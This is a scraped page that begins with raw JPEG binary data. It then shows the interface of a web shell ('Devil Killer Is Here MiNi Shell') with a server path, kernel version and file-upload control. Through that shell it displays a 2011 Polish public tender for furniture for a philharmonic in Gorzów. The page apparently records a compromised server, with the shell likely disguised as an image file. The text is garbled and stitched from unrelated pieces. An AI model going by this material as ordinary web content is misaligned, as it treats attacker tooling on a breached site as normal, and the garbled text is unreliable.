JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110315/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20110315/44454-N-2011.html

<p class="kh_header"><b>Gorzów Wlkp.: Dostawa i montaż mebli wolnostojących dla potrzeb Centrum Edukacji Artystycznej Filharmonia Gorzowska w Gorzowie Wlkp.</b><br>
<b>Numer ogłoszenia: 44454 - 2011; data zamieszczenia: 15.03.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Centrum Edukacji Artystycznej - Filharmonia Gorzowska , ul. Dziewięciu Muz 10, 66-400 Gorzów Wlkp., woj. lubuskie, tel. 95 7366655, faks 95 7366655.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.cea.gorzow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Instytucja kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa i montaż mebli wolnostojących dla potrzeb Centrum Edukacji Artystycznej Filharmonia Gorzowska w Gorzowie Wlkp..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> MEBLE WOLNOSTOJĄCE	 	
						
						
M01	1	
krzesło biurowe	obrotowe z podłokietnikami wysokim oparciem z regulacją wysokości i kąta, mechanizm synchroniczny, elementy stalowe chromowane, całość tapicerowana tkaniną typu Trevira CS, kolor grafitowo-czarny, z połyskiem metalicznym, typu Apolo, nr 102 z katalogu firmy FIGUERAS, wg próbek (jak na fotelach widowni), (pokoje biurowe)	szt.	22;	
M02	2	krzesło biurowe	na płozie z podłokietnikami, elementy stalowe chromowane, całość tapicerowana tkaniną typu Trevira CS, kolor grafitowo-czarny, z połyskiem metalicznym, typu Apolo, nr 102 z katalogu firmy FIGUERAS, wg próbek (jak na fotelach widowni), (pokoje biurowe)	szt.	2;	
M03	3	krzesło gabinetowe	obrotowe z podłokietnikami z regulacją 3D i zagłówkiem, elementy stalowe chromowane, mechanizm synchroniczny z regulacją głębokości siedziska i pochyleniem siedziska, regulacja podparcia lędźwi w 2 płaszczyznach, tapicerowane skórą ekologiczną w kolorze brązu w odcieniu dobranym do dębu antycznego (próbki do wyboru), podstawa chromowana z ochronnymi, plastikowymi wstawkami (pokoje dyrekcji)	szt.	2;	
M05	4	krzesło gabinetowe	na płozie z podłokietnikami, konstrukcja stalowa, chromowana, całość tapicerowana skórą ekologiczną w kolorze brązu w odcieniu dobranym do koloru dębu antycznego (pokoje dyrekcji)	szt.	10;	
M06	5	krzesło konferencyjne	konstrukcja stalowa, chromowana, siedzisko ze sklejki fornirowanej, fornir dębowy, kolor drewna dąb antyczny, wg próbek, siedzisko oraz oparcie tapicerowane tkaniną typu Trevira CS, kolor grafitowo-czarny, z połyskiem metalicznym, typu Apolo, nr 102 z katalogu firmy FIGUERAS, wg próbek (jak na fotelach widowni), model na 4 nóżkach z podłokietnikami  (sale prób)	szt.	32;	
M07	6	krzesło 	konstrukcja stalowa, chromowana, siedzisko ze sklejki fornirowanej, fornir dębowy, kolor drewna dąb antyczny, wg próbek, model na 4 nóżkach (pomieszczenia socjalne)	szt.	8;	
M08	7	krzesło 	konstrukcja stalowa, chromowana, siedzisko ze sklejki fornirowanej, fornir dębowy, kolor drewna dąb antyczny, wg próbek, model na 4 nóżkach (garderoby)	szt.	20;	
M09	8	krzesło	konstrukcja stalowa, chromowana, siedzisko ze sklejki fornirowanej, fornir dębowy, kolor drewna dąb antyczny, wg próbek, siedzisko oraz oparcie tapicerowane tkaniną typu Trevira CS, kolor grafitowo-czarny, z połyskiem metalicznym, typu Apolo, nr 102 z katalogu firmy FIGUERAS, wg próbek (jak na fotelach widowni), model na 4 nóżkach (garderoby)	szt.	49;	
M15	9	łóżko	pojedyncze 90x200cm przystosowane do łączenia w jedno duże łoże 180x200cm, prosta forma bez  wezgłowi, konstrukcja drewniana, wykończenie drewniane, fornirowane, dąb antyczny, wg próbek (garderoby gościnne), materac sprężynowy, pojedynczy, grubość min. 22cm, średnia twardość, z nakładką higieniczną (garderoby gościnne)	szt.	12;	
M16	10	biurko pracownicze	prostokątne 80x160cm, wysokość regulowana, blat z 28mm płyty wiórowej fornirowanej, fornir: dąb antyczny, wg próbek; nogi o przekroju prostokątnym 30x70mm malowane proszkowo w kolorze grafitowym (pokoje biurowe)	szt.	22;	
M17	11	dostawka do biurka 	prostokątna dostawka do biurka 60x120cm, wysokość regulowana, blat z płyty 28mm wiórowej fornirowanej, fornir: dąb antyczny, wg próbek; nogi o przekroju prostokątnym 30x70mm malowane proszkowo w kolorze grafitowym (pokoje biurowe 1 osobowe)	szt.	1;	
M18	12	biurko pracownicze	prostokątne 80x180cm, wysokość regulowana, blat z 28mm płyty wiórowej fornirowanej, fornir: dąb antyczny, wg próbek; nogi o przekroju prostokątnym 30x70mm malowane proszkowo w kolorze grafitowym (sekretariat)	szt.	1;	
M19	13	biurko pracownicze	prostokątne 80x180cm, wysokość regulowana, blat z 28mm płyty wiórowej fornirowanej, fornir: dąb antyczny, wg próbek; nogi o przekroju prostokątnym 30x70mm malowane proszkowo w kolorze grafitowym, z frontu płyta (dyrekcja)	szt.	2;	
M20	14	stół konferencyjny	modułowy 140x140cm blat z 28mm płyty wiórowej fornirowanej, fornir: dąb antyczny, wg próbek; nogi o przekroju prostokątnym 30x70mm malowane proszkowo w kolorze grafitowym (salki konferencyjne)	szt.	4;	
M21	15	biurko pracownicze	prostokątne 80x200cm, wysokość regulowana, blat z 28mm płyty wiórowej fornirowanej, fornir: dąb antyczny, wg próbek; nogi o przekroju prostokątnym 30x70mm malowane proszkowo w kolorze grafitowym (pokoje biurowe)	szt.	2;	
M24	16	stolik	okrągły, blat o średnicy 60cm płyta, tworzywo sztuczne wykończone na wysoki połysk, kolor od ecru do beżu, całość na jednej stalowej nodze, wysokość 60cm (kawiarnia)	szt.	12;	
M25	17	stolik	kwadratowy o wymiarze 80x80cm wys.45cm, blat z 28mm płyty wiórowej fornirowanej, fornir: dąb antyczny, wg próbek; nogi o przekroju prostokątnym 30x70mm malowane proszkowo w kolorze grafitowym (pokoje dyrekcji, komunikacja)	szt.	5;	
M27	18	toaletka 	wielostanowiskowa, o wymiarze 60x72.5cm, wys.ok.78cm, blat z 28mm płyty wiórowej fornirowanej, fornir: dąb antyczny, wg próbek; szuflady podblatowe, nogi o przekroju prostokątnym w kolorze blatu, meble pod wymiar pomieszczenia (garderoby wielostanowiskowe)	szt.	20;	
M28	19	toaletka	o wymiarze 60x160cm, wys.ok.78cm, płyta wiórowa fornirowana, fornir: dąb antyczny, wg próbek; szuflady podblatowe, nogi o przekroju prostokątnym w kolorze mebla, lustro 80x80cm, z regulowanym kątem nachylenia (garderoby gościnne)	szt.	6;	
M29	20	kontener	mobilny, płyta wiórowa fornirowanej, fornir: dąb antyczny, wg próbek; 4 szuflady D60 wys.59.5cm (pokoje biurowe)	szt.	19;	
M30	21	kontener	stacjonarny, płyta wiórowa fornirowana, fornir: dąb antyczny, wg próbek; 5 szuflad D80 wys.72cm (pokoje dyrekcyjne)	szt.	3;	
M31	22	szafa ubraniowa 	z drzwiami płytowymi uchylnymi, płyta wiórowa fornirowana, fornir: dąb antyczny, wg próbek; szer.50cm, gł.45cm, wys.220cm (pokoje biurowe)	szt.	14;	
M32	23	szafa na akta	z drzwiami płytowymi uchylnymi, płyta wiórowa fornirowana, fornir: dąb antyczny, wg próbek; szer.75cm, gł.45cm, wys.220cm, zamykana na klucz (pokoje biurowe)	szt.	32;	
M33	24	szafa na nuty,płyty	z drzwiami płytowymi uchylnymi, płyta wiórowa fornirowana, fornir: dąb antyczny, wg próbek; szer.75cm, gł.45cm, wys.220cm, szafa na nuty, płyty (pokój dyr. Artystycznego)	szt.	1;	
M34	25	szafa na akta	z drzwiami płytowymi uchylnymi, płyta wiórowa fornirowana, fornir: dąb antyczny, wg próbek; szer.65cm, gł.40cm, wys.220cm, zamykana na klucz (sekretariat)	szt.	4;	
M35	26	szafa ubraniowa 	z drzwiami płytowymi uchylnymi, płyta fornirowana, fornir: dąb antyczny, wg próbek; szer.160cm, gł.65cm, wys.220cm, pod wymiar wnęki (sekretariat)	szt.	1;	
M36	27	stolik	stolik na telefon, o wymiarze 60x40cm, wys.ok.78cm, blat z 28mm płyty wiórowej fornirowanej, fornir: dąb antyczny, wg próbek; nogi o przekroju prostokątnym w kolorze blatu (garderoby)	szt.	2;	
M37	28	szafa ubraniowa 	z drzwiami płytowymi uchylnymi, płyta wiórowa fornirowana, fornir: dąb antyczny, wg próbek; szer.90cm, gł.60cm, wys.220cm, jedno skrzydło szafy z lustrem o wys. 200 cm. (garderoby wielostanowiskowe)	szt.	4;	
M38	29	szafa	na instrumenty z drzwiami uchylnymi o wymiarach dł.190cm, gł.80cm, wys.220cm płyta wiórowa fornirowana, fornir: dąb antyczny, wg próbek; wewnątrz półki i wieszaki na instrumenty, pod wymiar wnęki (szatnia orkiestry)	szt.	6;	
M44	30	biurko pracownicze	prostokątne 80x208cm, wysokość regulowana, blat z 28mm płyty wiórowej fornirowanej, fornir: dąb antyczny, wg próbek; nogi o przekroju prostokątnym 30x70mm malowane proszkowo w kolorze grafitowym, meble pod wymiar wnęki (portiernia)	szt.	1;	
M45	31	szafa	na instrumenty z drzwiami uchylnymi o wymiarach dł.100cm, gł.80cm, wys.220cm płyta wiórowa oklejona laminatem w kolorze dębu antycznego, wg próbek, pod wymiar wnęki (pracownie)	szt.	6;	
M46	32	regał biblioteczny	o wymiarze dł.100cm, gł.40cm, wys.220cm płyta wiórowa oklejona laminatem w kolorze dębu antycznego, wg próbek, 5 półek, regał z tylną płytą	szt.	26;	
M50	33	szafa ubraniowa 	szafa wnękowa odzieżowa, dł. 100cm, gł. 63cm, wys. 220cm, drzwi przesuwne, profile aluminiowe anodowane proste (przekrój prostokątny), wypełnienie lustrem szklanym, szkło bezpieczne, wnętrze fornirowane, fornir dębowy, dąb antyczny, wg próbek (garderoby gościnne)	szt.	1;	
M51	34	szafa ubraniowa 	z drzwiami uchylnymi o wymiarach dł.100cm, gł.60cm, wys.220cm płyta wiórowa fornirowana, fornir: dąb antyczny, wg próbek (garderoby)	szt.	4;	
M53	35	biurko pracownicze	prostokątne 75x348cm, wysokość regulowana, blat z 28mm płyty wiórowej fornirowanej, fornir: dąb antyczny, wg próbek; nogi o przekroju prostokątnym 30x70mm malowane proszkowo w kolorze grafitowym, meble pod wymiar wnęki (kabiny akustyczne)	szt.	2;	
M54	36	szafka	nocna 45x45cm, wys.40cm prosta forma, płyta wiórowa fornirowana, fornir: dąb antyczny, wg próbek, szuflada (garderoby gościnne)	szt.	12;	
M55	37	szafa ubraniowa 	szafa wnękowa odzieżowa, dł. 205cm, gł. 63cm, wys. 220cm, drzwi przesuwne, profile aluminiowe anodowane proste (przekrój prostokątny), wypełnienie lustrem szklanym, szkło bezpieczne, wnętrze fornirowane, fornir dębowy, dąb antyczny, wg próbek, pod wymiar wnęki (garderoby gościnne)	szt.	3;	
M56	38	szafa ubraniowa 	szafa wnękowa odzieżowa, dł. 165cm, gł. 63cm, wys. 220cm, drzwi przesuwne, profile aluminiowe anodowane proste (przekrój prostokątny), wypełnienie lustrem szklanym, szkło bezpieczne, wnętrze fornirowane, fornir dębowy, dąb antyczny, wg próbek, pod wymiar wnęki (garderoby gościnne)	szt.	2;	
M58	39	szafa gospodarcza	o wymiarze 70x100cm, wys.220cm; płyta wiórowa oklejona laminatem w kolorze dębu antycznego, wg próbek (pomieszczenia socjalne, magazyny)	szt.	2;	
M62	40	regał magazynowy	o wymiarze 35x200cm, wys.220cm; płyta wiórowa oklejona laminatem w kolorze dębu antycznego, wg próbek	szt.	7;	
M63	41	ławka	ławka szatniowa prostokątna, 35x160cm, wysokość ok. 35cm, siedzenie z 28mm płyty wiórowej fornirowanej, fornir: dąb antyczny, wg próbek; nogi o przekroju prostokątnym 30x70mm malowane proszkowo w kolorze grafitowym (szatnie orkiestry)	szt.	30;	
M65	42	szafka TV	szafka o wymiarze 60x80cm, wys.ok.78cm, płyta wiórowa fornirowana, fornir: dąb antyczny, wg próbek, szuflady podblatowe (sale konferencyjne i garderoby gościnne)	szt.	1;	
M66	43	krzesło kontrabasisty - dyrygenta	regulacja oparcia, regulowana wysokość siedziska i podnóżka, krzesło obrotowe, konstrukcja - stalowa rama, 5 nóg u podstawy zapewnia stabilność, tapicerowany tkaniną typu Trevira Cs, kolor grafitowo - czarny.	szt.	10;	
M67	44	krzesło wiolonczelisty - harfisty - perkusisty	krzesło wiolonczelisty, harfy i perkusji. Konstrukcja stalowa, chromowana. Siedzisko krzesła z regulacją wysokości i kąta nachylenia. Siedzisko i oparcie wykonane z płyty klejonej wielowarstwowo - drewno dębowe, kolor dąb antyczny. Góra siedziska i przód oparcia  wyściełane tkaniną typu Trevira CS, kolor grafitowo-czarny, z połyskiem metalicznym, typu Apolo, nr 102 z katalogu firmy FIGUERAS, wg próbek (jak na fotelach widowni), z otworami wentylacyjnymi. Siedzisko obrotowe z możliwością blokady obrotu. Oparcie krzesła regulowane w wysokości i kącie nachylenia. Wysokość siedziska 44-57cm, szerokość 45cm, głębokość 40cm.	szt.	5;	
M68	45	krzesło orkiestry	dostępne w 3 rozmiarach, możliwość sztaplowania w celu wygodnego przechowywania, siedzisko z polipropylenu, wygodne wypukłe oparcie zapewniające podparcie odcinka lędźwiowego kręgosłupa, a jednocześnie zapewniające swobodę ruchów.	szt.	150;	
M70	46	stolik kawowy	kwadratowy o wymiarze 60x60cm wys.45cm, blat z 28mm płyty wiórowej fornirowanej, fornir: dąb antyczny, wg próbek; nogi drewniane, dębowe, kolor dąb antyczny, o przekroju kwadratowym 60x60mm (garderoby solistów)	szt.	4;	
M71	47	krzesło konferencyjne	konstrukcja stalowa, chromowana, siedzisko ze sklejki fornirowanej, fornir dębowy, kolor drewna dąb antyczny, wg próbek, konstrukcja stalowa, chromowana, siedzisko oraz oparcie tapicerowane tkaniną typu Trevira CS, kolor grafitowo-czarny, z połyskiem metalicznym, typu Apolo, nr 102 z katalogu firmy FIGUERAS, wg próbek (jak na fotelach widowni), model na 4 nóżkach z drewnianymi podłokietnikami  (sale prób)	szt.	146;	
M74	48	stół warsztatowy	prostokątny 150x90 cm, wysokość 75 cm, meble metalowe, blat ze sklejki 36 mm, pokrycie blatu ze sklejki lub blachy albo ryflowanej gumy  lub z PCV - zależnie od potrzeby, nośność konstrukcji z pełną zabudowa do 500 kg, kolor RAL 7024 - Graphigrau - grafitowy	szt.	1;	
M75	49	gablota na klucze w recepcji	gablota z profili aluminiowych, przeszkolona, przeznaczona na ok. 150 kluczy, gablota może być podświetlana, kolor pleców gabloty - RAL 7024. wymiary gabloty: 85x110 cm., głębokość ok.6,9cm.	szt.	2	
M76	50	szafka - stojak na kontrabasy	drewniana szafka - stojak do bezpiecznego przechowywania kontrabasów, wymiary podstawy szafki - 155x84 cm, wysokość 128 cm.	szt.	3;	
M78	51	szafa ubraniowa 	z drzwiami płytowymi uchylnymi, płyta wiórowa fornirowana, fornir: dąb antyczny, wg próbek; szer.75cm, gł.45cm, wys.220cm, jedno skrzydło szafy z lustrem o wysokości 200 cm.(pokój dyrektora)	szt.	2;	
M79	52	regał na sprzęt elektroniczny	regał z półkami o wymiarach: szerokość - 75 cm, głębokość - 45 cm, wysokość - 130 cm. Regał na sprzęt elektroniczny (pokój dyrektora)	szt.	2;	
M80	53	regał z półkami	regał o wysokości 100 cm, szerokości 100 cm, głębokości 45 cm z półkami	szt.	1;	
M81	54	podkładka drewniana	podkładka pod kontrabasy i wiolonczele	szt.	10..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3, 39.11.00.00-6, 39.11.20.00-0, 39.11.31.00-8, 39.12.12.00-8, 39.12.11.00-7, 39.13.21.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 06.05.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Wykonawca przystępujący do przetargu jest obowiązany wnieść wadium w wysokości
10 000,00 PLN (słownie: dziesięć tysięcy złotych 00/100);
2.	Wadium należy wnieść przed upływem terminu składania ofert.
3.	Wadium może być wnoszone w jednej lub w kilku następujących formach, zgodnie z art. 45 ustawy Prawo zamówień publicznych tj.:
-	w pieniądzu, 
-	w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
-	w gwarancjach bankowych, 
-	w gwarancjach ubezpieczeniowych, 
-	w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy 
z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości 
(Dz. U. Nr 109, poz. 1158, z późn. zm.).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi posiadać doświadczenie polegające na wykonaniu w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jednego zadania o wartości brutto minimum 300.000,00 zł obejmującego dostawę odpowiadającą przedmiotowi zamówienia lub dwóch zadań, każde o wartości brutto minimum 150.000,00 zł obejmujących dostawę odpowiadającą przedmiotowi zamówienia.
Przez zadanie obejmujące wykonanie dostaw odpowiadających przedmiotowi niniejszego zamówienia rozumie się  dostawę (wraz z montażem), której zakres obejmował meble wolnostojące.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznaczył szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznaczył szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi posiadać środki finansowe lub zdolność kredytową:  nie mniej niż 300 000,00 zł (słownie: trzysta tysięcy złotych 00/100);</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
